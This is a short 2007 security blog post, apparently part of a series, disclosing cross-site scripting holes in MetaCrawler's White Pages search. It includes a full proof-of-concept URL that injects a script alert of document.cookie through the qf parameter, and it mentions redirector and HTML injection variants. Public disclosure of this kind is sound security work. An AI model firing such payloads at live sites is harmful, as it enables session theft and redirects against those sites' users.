Websecurity - Веб безпека

Next participant of the project is MetaCrawler search engine. It is one of the popular meta search engines.

The vulnerabilities are at MetaCrawler (www.metacrawler.com) in White Pages search. These Cross-Site Scripting holes I found 27.05.2007.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• redirector
• html injection

The vulnerabilities are in qf and qn parameters:
http://www.metacrawler.com/info.metac/white-pages/message.htm?otmpl=/white-pages/results.htm&qf=%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchtype=citystate

Moral: searching in white pages can be dangerous.

Note, that MetaCrawler engine belongs to InfoSpace, Inc. So they also responsible for these vulnerabilities. And don’t worry guys, InfoSpace will also be in MOSEB.

This entry was posted on 22:41 13.06.2007 and is filed under MOSEB. You can follow any responses to this entry through the RSS 2.0 feed.